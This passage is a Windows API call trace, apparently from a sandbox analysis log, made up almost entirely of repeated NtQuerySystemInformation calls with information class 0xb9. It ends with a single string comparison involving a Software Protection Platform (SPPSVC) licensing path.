(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe080, Length=0x28, ResultLength=0x0) [0228.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe8c0, Length=0x40, ResultLength=0x0) [0228.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc70, Length=0x28, ResultLength=0x0) [0228.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdcf0, Length=0x28, ResultLength=0x0) [0228.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdcf0, Length=0x28, ResultLength=0x0) [0228.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb90, Length=0x20, ResultLength=0x0) [0228.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc50, Length=0x20, ResultLength=0x0) [0228.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdbe0, Length=0x20, ResultLength=0x0) [0228.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdbe0, Length=0x20, ResultLength=0x0) [0228.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdec0, Length=0x28, ResultLength=0x0) [0228.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdec0, Length=0x28, ResultLength=0x0) [0228.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x28, ResultLength=0x0) [0228.349] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.349] NtQuerySystemInformation 